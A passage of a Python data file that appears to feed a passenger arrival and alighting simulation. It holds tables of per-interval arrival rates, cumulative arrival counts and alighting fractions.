(4.065829381279876, 10.5741062609603, 11.7708617403956, 9.347603336352659, 10.726619391025642, 6.630775943538648), # 11
(4.094667669007903, 10.656467897727273, 11.813157937017996, 9.382777173913043, 10.780471153846154, 6.627759782608695), # 12
(4.122786981757876, 10.736022647920176, 11.85354499160954, 9.416410250603866, 10.832000801282053, 6.624677679649759), # 13
(4.15015810164862, 10.81265802469136, 11.891979791488144, 9.448461352657004, 10.881141025641025, 6.621529951690821), # 14
(4.1767518107989465, 10.886261541193182, 11.928419223971721, 9.478889266304348, 10.92782451923077, 6.618316915760871), # 15
(4.202538891327675, 10.956720710578002, 11.96282017637818, 9.507652777777778, 10.971983974358976, 6.61503888888889), # 16
(4.227490125353625, 11.023923045998176, 11.995139536025421, 9.53471067330918, 11.013552083333336, 6.611696188103866), # 17
(4.25157629499561, 11.087756060606061, 12.025334190231364, 9.560021739130436, 11.052461538461543, 6.608289130434783), # 18
(4.274768182372451, 11.148107267554012, 12.053361026313912, 9.58354476147343, 11.088645032051284, 6.604818032910629), # 19
(4.297036569602966, 11.204864179994388, 12.079176931590974, 9.60523852657005, 11.122035256410259, 6.601283212560387), # 20
(4.318352238805971, 11.257914311079544, 12.102738793380466, 9.625061820652174, 11.152564903846153, 6.597684986413044), # 21
(4.338685972100283, 11.307145173961842, 12.124003499000287, 9.642973429951692, 11.180166666666667, 6.5940236714975855), # 22
(4.358008551604722, 11.352444281793632, 12.142927935768354, 9.658932140700484, 11.204773237179488, 6.590299584842997), # 23
(4.3762907594381035, 11.393699147727272, 12.159468991002571, 9.672896739130437, 11.226317307692307, 6.586513043478261), # 24
(4.393503377719247, 11.430797284915124, 12.173583552020853, 9.684826011473431, 11.244731570512819, 6.582664364432368), # 25
(4.409617188566969, 11.46362620650954, 12.185228506141103, 9.694678743961353, 11.259948717948719, 6.5787538647343), # 26
(4.424602974100088, 11.492073425662877, 12.194360740681233, 9.702413722826089, 11.271901442307694, 6.574781861413045), # 27
(4.438431516437421, 11.516026455527497, 12.200937142959157, 9.707989734299519, 11.280522435897437, 6.570748671497586), # 28
(4.4510735976977855, 11.535372809255753, 12.204914600292774, 9.711365564613528, 11.285744391025641, 6.566654612016909), # 29
(4.4625, 11.55, 12.20625, 9.7125, 11.287500000000001, 6.562500000000001), # 30
(4.47319183983376, 11.56215031960227, 12.205248928140096, 9.712295118464054, 11.286861125886526, 6.556726763701484), # 31
(4.4836528452685425, 11.574140056818184, 12.202274033816424, 9.711684477124184, 11.28495815602837, 6.547834661835751), # 32
(4.493887715792838, 11.585967720170455, 12.197367798913046, 9.710674080882354, 11.281811569148937, 6.535910757121439), # 33
(4.503901150895141, 11.597631818181819, 12.19057270531401, 9.709269934640524, 11.277441843971632, 6.521042112277196), # 34
(4.513697850063939, 11.609130859374998, 12.181931234903383, 9.707478043300654, 11.27186945921986, 6.503315790021656), # 35
(4.523282512787724, 11.62046335227273, 12.171485869565219, 9.705304411764708, 11.265114893617023, 6.482818853073463), # 36
(4.532659838554988, 11.631627805397729, 12.159279091183576, 9.70275504493464, 11.257198625886524, 6.4596383641512585), # 37
(4.5418345268542195, 11.642622727272729, 12.145353381642513, 9.699835947712419, 11.248141134751775, 6.433861385973679), # 38
(4.5508112771739135, 11.653446626420456, 12.129751222826087, 9.696553125000001, 11.23796289893617, 6.40557498125937), # 39
(4.559594789002558, 11.664098011363638, 12.11251509661836, 9.692912581699348, 11.22668439716312, 6.37486621272697), # 40
(4.568189761828645, 11.674575390625, 12.093687484903382, 9.68892032271242, 11.214326108156028, 6.34182214309512), # 41
(4.576600895140665, 11.684877272727276, 12.07331086956522, 9.684582352941177, 11.2009085106383, 6.3065298350824595), # 42
(4.584832888427111, 11.69500216619318, 12.051427732487923, 9.679904677287583, 11.186452083333334, 6.26907635140763), # 43
(4.592890441176471, 11.704948579545455, 12.028080555555556, 9.674893300653595, 11.17097730496454, 6.229548754789272), # 44
(4.600778252877237, 11.714715021306818, 12.003311820652177, 9.669554227941177, 11.15450465425532, 6.188034107946028), # 45
(4.6085010230179035, 11.724300000000003, 11.97716400966184, 9.663893464052288, 11.137054609929079, 6.144619473596536), # 46
(4.616063451086957, 11.733702024147728, 11.9496796044686, 9.65791701388889, 11.118647650709221, 6.099391914459438), # 47
(4.623470236572891, 11.742919602272728, 11.920901086956523, 9.651630882352942, 11.099304255319149, 6.052438493253375), # 48
(4.630726078964194, 11.751951242897727, 11.890870939009663, 9.645041074346407, 11.079044902482272, 6.003846272696985), # 49
(4.6378356777493615, 11.760795454545454, 11.85963164251208, 9.638153594771243, 11.057890070921987, 5.953702315508913), # 50
(4.6448037324168805, 11.769450745738636, 11.827225679347826, 9.630974448529413, 11.035860239361703, 5.902093684407797), # 51
(4.651634942455243, 11.777915625, 11.793695531400965, 9.623509640522876, 11.012975886524824, 5.849107442112278), # 52
(4.658334007352941, 11.786188600852274, 11.759083680555555, 9.615765175653596, 10.989257491134753, 5.794830651340996), # 53
(4.6649056265984665, 11.79426818181818, 11.723432608695653, 9.60774705882353, 10.964725531914894, 5.739350374812594), # 54
(4.671354499680307, 11.802152876420456, 11.686784797705313, 9.599461294934642, 10.939400487588653, 5.682753675245711), # 55
(4.677685326086957, 11.809841193181818, 11.649182729468599, 9.59091388888889, 10.913302836879433, 5.625127615358988), # 56
(4.683902805306906, 11.817331640625003, 11.610668885869565, 9.582110845588236, 10.886453058510638, 5.566559257871065), # 57
(4.690011636828645, 11.824622727272727, 11.57128574879227, 9.573058169934642, 10.858871631205675, 5.507135665500583), # 58
(0.0, 0.0, 0.0, 0.0, 0.0, 0.0), # 59
)
passenger_arriving_acc = (
(3, 5, 3, 4, 1, 0, 8, 9, 10, 7, 1, 0), # 0
(4, 19, 8, 6, 4, 0, 16, 16, 16, 9, 3, 0), # 1
(6, 28, 14, 11, 9, 0, 22, 29, 18, 11, 6, 0), # 2
(9, 37, 23, 12, 13, 0, 27, 36, 23, 16, 6, 0), # 3
(17, 47, 28, 15, 17, 0, 33, 43, 29, 20, 7, 0), # 4
(21, 56, 33, 18, 18, 0, 40, 49, 39, 27, 9, 0), # 5
(23, 63, 46, 24, 20, 0, 46, 52, 45, 29, 12, 0), # 6
(25, 71, 55, 26, 22, 0, 53, 58, 47, 37, 12, 0), # 7
(29, 78, 67, 32, 22, 0, 54, 65, 56, 41, 17, 0), # 8
(30, 88, 73, 35, 24, 0, 58, 70, 67, 47, 19, 0), # 9
(35, 90, 74, 38, 27, 0, 65, 74, 73, 49, 22, 0), # 10
(40, 98, 81, 45, 30, 0, 73, 82, 80, 54, 23, 0), # 11
(50, 103, 87, 49, 32, 0, 81, 91, 89, 61, 30, 0), # 12
(52, 111, 95, 50, 36, 0, 90, 100, 97, 67, 32, 0), # 13
(54, 121, 98, 57, 38, 0, 97, 110, 104, 71, 33, 0), # 14
(60, 128, 108, 62, 42, 0, 101, 114, 111, 79, 34, 0), # 15
(64, 137, 120, 67, 44, 0, 104, 119, 116, 82, 37, 0), # 16
(67, 148, 127, 69, 47, 0, 107, 124, 120, 89, 39, 0), # 17
(76, 158, 135, 71, 48, 0, 116, 129, 129, 96, 41, 0), # 18
(80, 169, 145, 75, 49, 0, 125, 138, 135, 98, 44, 0), # 19
(85, 179, 155, 79, 51, 0, 131, 150, 143, 102, 47, 0), # 20
(90, 185, 166, 83, 51, 0, 136, 153, 147, 107, 51, 0), # 21
(96, 197, 174, 88, 52, 0, 142, 162, 151, 109, 52, 0), # 22
(98, 202, 178, 91, 53, 0, 149, 168, 163, 114, 53, 0), # 23
(100, 208, 186, 95, 61, 0, 151, 181, 171, 117, 56, 0), # 24
(108, 218, 196, 96, 64, 0, 156, 185, 179, 120, 56, 0), # 25
(112, 226, 205, 100, 67, 0, 162, 195, 183, 126, 60, 0), # 26
(117, 235, 212, 104, 71, 0, 165, 208, 189, 129, 63, 0), # 27
(123, 247, 217, 112, 74, 0, 171, 214, 195, 133, 64, 0), # 28
(129, 256, 223, 113, 78, 0, 177, 222, 201, 140, 67, 0), # 29
(133, 264, 229, 117, 83, 0, 180, 236, 207, 144, 70, 0), # 30
(138, 272, 234, 120, 84, 0, 187, 244, 213, 150, 73, 0), # 31
(145, 278, 242, 122, 86, 0, 193, 254, 218, 159, 74, 0), # 32
(149, 290, 251, 130, 88, 0, 201, 266, 222, 163, 76, 0), # 33
(154, 296, 257, 133, 91, 0, 206, 273, 227, 170, 80, 0), # 34
(160, 305, 265, 136, 91, 0, 214, 284, 237, 172, 82, 0), # 35
(163, 311, 280, 140, 93, 0, 224, 293, 241, 173, 84, 0), # 36
(165, 315, 289, 142, 94, 0, 229, 303, 243, 180, 86, 0), # 37
(167, 321, 295, 146, 96, 0, 235, 308, 248, 188, 88, 0), # 38
(173, 331, 308, 150, 97, 0, 243, 317, 251, 195, 89, 0), # 39
(175, 341, 315, 160, 102, 0, 250, 332, 259, 199, 91, 0), # 40
(178, 349, 317, 166, 104, 0, 253, 335, 265, 208, 94, 0), # 41
(183, 359, 328, 171, 109, 0, 267, 344, 272, 210, 96, 0), # 42
(188, 367, 331, 177, 111, 0, 272, 356, 278, 220, 100, 0), # 43
(195, 375, 343, 182, 114, 0, 282, 365, 285, 226, 100, 0), # 44
(202, 383, 348, 186, 115, 0, 290, 377, 293, 231, 102, 0), # 45
(210, 395, 361, 190, 117, 0, 296, 380, 300, 235, 103, 0), # 46
(217, 406, 371, 194, 118, 0, 297, 384, 302, 238, 106, 0), # 47
(223, 411, 379, 196, 121, 0, 301, 394, 308, 243, 107, 0), # 48
(232, 425, 388, 202, 126, 0, 308, 401, 315, 248, 107, 0), # 49
(233, 437, 397, 203, 126, 0, 312, 409, 320, 249, 109, 0), # 50
(236, 445, 404, 206, 130, 0, 316, 414, 331, 254, 111, 0), # 51
(242, 453, 412, 211, 133, 0, 325, 422, 339, 263, 114, 0), # 52
(246, 460, 425, 214, 138, 0, 329, 427, 343, 268, 116, 0), # 53
(254, 467, 432, 216, 140, 0, 333, 436, 349, 270, 117, 0), # 54
(257, 476, 436, 220, 140, 0, 341, 440, 355, 278, 121, 0), # 55
(260, 485, 448, 222, 144, 0, 347, 444, 363, 283, 123, 0), # 56
(264, 494, 454, 229, 146, 0, 352, 451, 372, 286, 123, 0), # 57
(271, 499, 461, 234, 147, 0, 359, 461, 376, 291, 126, 0), # 58
(271, 499, 461, 234, 147, 0, 359, 461, 376, 291, 126, 0), # 59
)
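The `passenger_arriving_acc` rows read as column-wise running totals of `passenger_arriving`. A small self-contained check of that relationship, with values copied from the first three rows of the tables above:

```python
from itertools import accumulate

# First three rows of passenger_arriving, copied from the data above.
arriving = [
    (3, 5, 3, 4, 1, 0, 8, 9, 10, 7, 1, 0),
    (1, 14, 5, 2, 3, 0, 8, 7, 6, 2, 2, 0),
    (2, 9, 6, 5, 5, 0, 6, 13, 2, 2, 3, 0),
]

# Column-wise running totals, element by element.
acc = list(accumulate(arriving, lambda a, b: tuple(x + y for x, y in zip(a, b))))
print(acc[1])  # (4, 19, 8, 6, 4, 0, 16, 16, 16, 9, 3, 0) — matches row 1 of passenger_arriving_acc
print(acc[2])  # (6, 28, 14, 11, 9, 0, 22, 29, 18, 11, 6, 0) — matches row 2
```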
passenger_arriving_rate = (
(3.7095121817383676, 7.612035984848484, 6.715158258354756, 3.5483152173913037, 2.000048076923077, 0.0, 6.659510869565219, 8.000192307692307, 5.322472826086956, 4.476772172236504, 1.903008996212121, 0.0), # 0
(3.7443308140669203, 7.696686590558361, 6.751429051520996, 3.5680760567632848, 2.0150386217948717, 0.0, 6.657240994867151, 8.060154487179487, 5.352114085144928, 4.500952701013997, 1.9241716476395903, 0.0), # 1
(3.7787518681104277, 7.780081571268237, 6.786838903170522, 3.58740193236715, 2.0297128205128203, 0.0, 6.654901690821256, 8.118851282051281, 5.381102898550726, 4.524559268780347, 1.9450203928170593, 0.0), # 2
(3.8127461259877085, 7.8621309375, 6.821361945694087, 3.6062763586956517, 2.044057211538462, 0.0, 6.652493274456523, 8.176228846153847, 5.409414538043478, 4.547574630462725, 1.965532734375, 0.0), # 3
(3.8462843698175795, 7.942744699775533, 6.854972311482434, 3.624682850241546, 2.0580583333333333, 0.0, 6.6500160628019325, 8.232233333333333, 5.437024275362319, 4.569981540988289, 1.9856861749438832, 0.0), # 4
(3.879337381718857, 8.021832868616723, 6.887644132926307, 3.6426049214975844, 2.0717027243589743, 0.0, 6.647470372886473, 8.286810897435897, 5.463907382246377, 4.591762755284204, 2.005458217154181, 0.0), # 5
(3.9118759438103607, 8.099305454545455, 6.919351542416455, 3.660026086956522, 2.084976923076923, 0.0, 6.644856521739131, 8.339907692307692, 5.490039130434783, 4.612901028277636, 2.0248263636363637, 0.0), # 6
(3.943870838210907, 8.175072468083613, 6.950068672343615, 3.6769298611111116, 2.0978674679487184, 0.0, 6.64217482638889, 8.391469871794873, 5.515394791666668, 4.633379114895743, 2.043768117020903, 0.0), # 7
(3.975292847039314, 8.249043919753085, 6.979769655098544, 3.693299758454106, 2.1103608974358976, 0.0, 6.639425603864735, 8.44144358974359, 5.5399496376811594, 4.653179770065696, 2.062260979938271, 0.0), # 8
(4.006112752414399, 8.321129820075758, 7.00842862307198, 3.709119293478261, 2.12244375, 0.0, 6.636609171195653, 8.489775, 5.563678940217391, 4.672285748714653, 2.0802824550189394, 0.0), # 9
(4.03630133645498, 8.391240179573513, 7.03601970865467, 3.724371980676329, 2.134102564102564, 0.0, 6.633725845410628, 8.536410256410257, 5.586557971014494, 4.690679805769779, 2.0978100448933783, 0.0), # 10
(4.065829381279876, 8.459285008768239, 7.06251704423736, 3.739041334541063, 2.145323878205128, 0.0, 6.630775943538648, 8.581295512820512, 5.608562001811595, 4.70834469615824, 2.1148212521920597, 0.0), # 11
(4.094667669007903, 8.525174318181818, 7.087894762210797, 3.7531108695652167, 2.156094230769231, 0.0, 6.627759782608695, 8.624376923076923, 5.6296663043478254, 4.725263174807198, 2.1312935795454546, 0.0), # 12
(4.122786981757876, 8.58881811833614, 7.112126994965724, 3.766564100241546, 2.1664001602564102, 0.0, 6.624677679649759, 8.665600641025641, 5.649846150362319, 4.741417996643816, 2.147204529584035, 0.0), # 13
(4.15015810164862, 8.650126419753088, 7.135187874892886, 3.779384541062801, 2.1762282051282047, 0.0, 6.621529951690821, 8.704912820512819, 5.669076811594202, 4.756791916595257, 2.162531604938272, 0.0), # 14
(4.1767518107989465, 8.709009232954545, 7.157051534383032, 3.7915557065217387, 2.1855649038461538, 0.0, 6.618316915760871, 8.742259615384615, 5.6873335597826085, 4.771367689588688, 2.177252308238636, 0.0), # 15
(4.202538891327675, 8.7653765684624, 7.177692105826908, 3.803061111111111, 2.194396794871795, 0.0, 6.61503888888889, 8.77758717948718, 5.7045916666666665, 4.785128070551272, 2.1913441421156, 0.0), # 16
(4.227490125353625, 8.81913843679854, 7.197083721615253, 3.8138842693236716, 2.202710416666667, 0.0, 6.611696188103866, 8.810841666666668, 5.720826403985508, 4.798055814410168, 2.204784609199635, 0.0), # 17
(4.25157629499561, 8.870204848484848, 7.215200514138818, 3.824008695652174, 2.2104923076923084, 0.0, 6.608289130434783, 8.841969230769234, 5.736013043478262, 4.810133676092545, 2.217551212121212, 0.0), # 18
(4.274768182372451, 8.918485814043208, 7.232016615788346, 3.8334179045893717, 2.2177290064102566, 0.0, 6.604818032910629, 8.870916025641026, 5.750126856884058, 4.8213444105255645, 2.229621453510802, 0.0), # 19
(4.297036569602966, 8.96389134399551, 7.247506158954584, 3.8420954106280196, 2.2244070512820517, 0.0, 6.601283212560387, 8.897628205128207, 5.76314311594203, 4.831670772636389, 2.2409728359988774, 0.0), # 20
(4.318352238805971, 9.006331448863634, 7.261643276028279, 3.8500247282608693, 2.2305129807692303, 0.0, 6.597684986413044, 8.922051923076921, 5.775037092391305, 4.841095517352186, 2.2515828622159084, 0.0), # 21
(4.338685972100283, 9.045716139169473, 7.274402099400172, 3.8571893719806765, 2.2360333333333333, 0.0, 6.5940236714975855, 8.944133333333333, 5.785784057971015, 4.849601399600115, 2.2614290347923682, 0.0), # 22
(4.358008551604722, 9.081955425434906, 7.285756761461012, 3.8635728562801934, 2.2409546474358972, 0.0, 6.590299584842997, 8.963818589743589, 5.79535928442029, 4.857171174307341, 2.2704888563587264, 0.0), # 23
(4.3762907594381035, 9.114959318181818, 7.295681394601543, 3.869158695652174, 2.2452634615384612, 0.0, 6.586513043478261, 8.981053846153845, 5.803738043478262, 4.863787596401028, 2.2787398295454544, 0.0), # 24
(4.393503377719247, 9.1446378279321, 7.304150131212511, 3.8739304045893723, 2.2489463141025636, 0.0, 6.582664364432368, 8.995785256410255, 5.810895606884059, 4.869433420808341, 2.286159456983025, 0.0), # 25
(4.409617188566969, 9.17090096520763, 7.311137103684661, 3.8778714975845405, 2.2519897435897436, 0.0, 6.5787538647343, 9.007958974358974, 5.816807246376811, 4.874091402456441, 2.2927252413019077, 0.0), # 26
(4.424602974100088, 9.193658740530301, 7.31661644440874, 3.880965489130435, 2.2543802884615385, 0.0, 6.574781861413045, 9.017521153846154, 5.821448233695653, 4.877744296272493, 2.2984146851325753, 0.0), # 27
(4.438431516437421, 9.212821164421996, 7.320562285775494, 3.8831958937198072, 2.256104487179487, 0.0, 6.570748671497586, 9.024417948717948, 5.824793840579711, 4.8803748571836625, 2.303205291105499, 0.0), # 28
(4.4510735976977855, 9.228298247404602, 7.322948760175664, 3.884546225845411, 2.257148878205128, 0.0, 6.566654612016909, 9.028595512820512, 5.826819338768117, 4.881965840117109, 2.3070745618511506, 0.0), # 29
(4.4625, 9.24, 7.32375, 3.885, 2.2575000000000003, 0.0, 6.562500000000001, 9.030000000000001, 5.8275, 4.8825, 2.31, 0.0), # 30
(4.47319183983376, 9.249720255681815, 7.323149356884057, 3.884918047385621, 2.257372225177305, 0.0, 6.556726763701484, 9.02948890070922, 5.827377071078432, 4.882099571256038, 2.312430063920454, 0.0), # 31
(4.4836528452685425, 9.259312045454546, 7.3213644202898545, 3.884673790849673, 2.2569916312056737, 0.0, 6.547834661835751, 9.027966524822695, 5.82701068627451, 4.880909613526569, 2.3148280113636366, 0.0), # 32
(4.493887715792838, 9.268774176136363, 7.3184206793478275, 3.8842696323529413, 2.2563623138297872, 0.0, 6.535910757121439, 9.025449255319149, 5.826404448529412, 4.878947119565218, 2.3171935440340907, 0.0), # 33
(4.503901150895141, 9.278105454545454, 7.314343623188405, 3.8837079738562093, 2.2554883687943263, 0.0, 6.521042112277196, 9.021953475177305, 5.825561960784314, 4.876229082125604, 2.3195263636363634, 0.0), # 34
(4.513697850063939, 9.287304687499997, 7.3091587409420296, 3.882991217320261, 2.2543738918439717, 0.0, 6.503315790021656, 9.017495567375887, 5.824486825980392, 4.872772493961353, 2.3218261718749993, 0.0), # 35
(4.523282512787724, 9.296370681818182, 7.302891521739131, 3.8821217647058828, 2.253022978723404, 0.0, 6.482818853073463, 9.012091914893617, 5.823182647058824, 4.868594347826087, 2.3240926704545455, 0.0), # 36
(4.532659838554988, 9.305302244318183, 7.295567454710145, 3.881102017973856, 2.2514397251773044, 0.0, 6.4596383641512585, 9.005758900709218, 5.821653026960784, 4.86371163647343, 2.3263255610795457, 0.0), # 37
(4.5418345268542195, 9.314098181818181, 7.287212028985508, 3.8799343790849674, 2.249628226950355, 0.0, 6.433861385973679, 8.99851290780142, 5.819901568627452, 4.858141352657005, 2.3285245454545453, 0.0), # 38
(4.5508112771739135, 9.322757301136363, 7.277850733695652, 3.87862125, 2.247592579787234, 0.0, 6.40557498125937, 8.990370319148935, 5.817931875, 4.8519004891304345, 2.330689325284091, 0.0), # 39
(4.559594789002558, 9.33127840909091, 7.267509057971015, 3.8771650326797387, 2.245336879432624, 0.0, 6.37486621272697, 8.981347517730496, 5.815747549019608, 4.845006038647344, 2.3328196022727274, 0.0), # 40
(4.568189761828645, 9.3396603125, 7.256212490942029, 3.8755681290849675, 2.2428652216312055, 0.0, 6.34182214309512, 8.971460886524822, 5.813352193627452, 4.837474993961353, 2.334915078125, 0.0), # 41
(4.576600895140665, 9.34790181818182, 7.2439865217391315, 3.8738329411764707, 2.2401817021276598, 0.0, 6.3065298350824595, 8.960726808510639, 5.810749411764706, 4.829324347826088, 2.336975454545455, 0.0), # 42
(4.584832888427111, 9.356001732954544, 7.230856639492753, 3.8719618709150327, 2.2372904166666667, 0.0, 6.26907635140763, 8.949161666666667, 5.80794280637255, 4.820571092995169, 2.339000433238636, 0.0), # 43
(4.592890441176471, 9.363958863636363, 7.216848333333333, 3.8699573202614377, 2.2341954609929076, 0.0, 6.229548754789272, 8.93678184397163, 5.804935980392157, 4.811232222222222, 2.3409897159090907, 0.0), # 44
(4.600778252877237, 9.371772017045453, 7.201987092391306, 3.8678216911764705, 2.230900930851064, 0.0, 6.188034107946028, 8.923603723404256, 5.801732536764706, 4.80132472826087, 2.3429430042613633, 0.0), # 45
(4.6085010230179035, 9.379440000000002, 7.186298405797103, 3.8655573856209147, 2.2274109219858156, 0.0, 6.144619473596536, 8.909643687943262, 5.798336078431372, 4.790865603864735, 2.3448600000000006, 0.0), # 46
(4.616063451086957, 9.386961619318182, 7.16980776268116, 3.8631668055555552, 2.223729530141844, 0.0, 6.099391914459438, 8.894918120567375, 5.794750208333333, 4.77987184178744, 2.3467404048295455, 0.0), # 47
(4.623470236572891, 9.394335681818182, 7.152540652173913, 3.8606523529411763, 2.21986085106383, 0.0, 6.052438493253375, 8.87944340425532, 5.790978529411765, 4.7683604347826085, 2.3485839204545456, 0.0), # 48
(4.630726078964194, 9.401560994318181, 7.134522563405797, 3.8580164297385626, 2.2158089804964543, 0.0, 6.003846272696985, 8.863235921985817, 5.787024644607844, 4.7563483756038645, 2.3503902485795454, 0.0), # 49
(4.6378356777493615, 9.408636363636361, 7.115778985507247, 3.8552614379084966, 2.211578014184397, 0.0, 5.953702315508913, 8.846312056737588, 5.782892156862745, 4.743852657004831, 2.3521590909090904, 0.0), # 50
(4.6448037324168805, 9.415560596590907, 7.096335407608696, 3.852389779411765, 2.2071720478723407, 0.0, 5.902093684407797, 8.828688191489363, 5.778584669117648, 4.73089027173913, 2.353890149147727, 0.0), # 51
(4.651634942455243, 9.4223325, 7.0762173188405795, 3.84940385620915, 2.2025951773049646, 0.0, 5.849107442112278, 8.810380709219858, 5.774105784313726, 4.717478212560386, 2.355583125, 0.0), # 52
(4.658334007352941, 9.428950880681818, 7.055450208333333, 3.8463060702614382, 2.1978514982269504, 0.0, 5.794830651340996, 8.791405992907801, 5.769459105392158, 4.703633472222222, 2.3572377201704544, 0.0), # 53
(4.6649056265984665, 9.435414545454544, 7.034059565217391, 3.843098823529412, 2.192945106382979, 0.0, 5.739350374812594, 8.771780425531915, 5.764648235294119, 4.689373043478261, 2.358853636363636, 0.0), # 54
(4.671354499680307, 9.441722301136364, 7.012070878623187, 3.8397845179738566, 2.1878800975177306, 0.0, 5.682753675245711, 8.751520390070922, 5.759676776960785, 4.674713919082125, 2.360430575284091, 0.0), # 55
(4.677685326086957, 9.447872954545453, 6.989509637681159, 3.8363655555555556, 2.1826605673758865, 0.0, 5.625127615358988, 8.730642269503546, 5.754548333333334, 4.65967309178744, 2.361968238636363, 0.0), # 56
(4.683902805306906, 9.453865312500001, 6.966401331521738, 3.832844338235294, 2.1772906117021273, 0.0, 5.566559257871065, 8.70916244680851, 5.749266507352941, 4.644267554347826, 2.3634663281250003, 0.0), # 57
(4.690011636828645, 9.459698181818181, 6.942771449275362, 3.8292232679738563, 2.1717743262411346, 0.0, 5.507135665500583, 8.687097304964539, 5.743834901960785, 4.628514299516908, 2.3649245454545453, 0.0), # 58
(0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0), # 59
)
passenger_allighting_rate = (
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 0
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 1
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 2
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 3
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 4
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 5
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 6
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 7
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 8
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 9
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 10
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 11
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 12
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 13
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 14
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 15
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 16
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 17
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 18
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 19
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 20
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 21
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 22
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 23
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 24
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 25
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 26
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 27
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 28
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 29
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 30
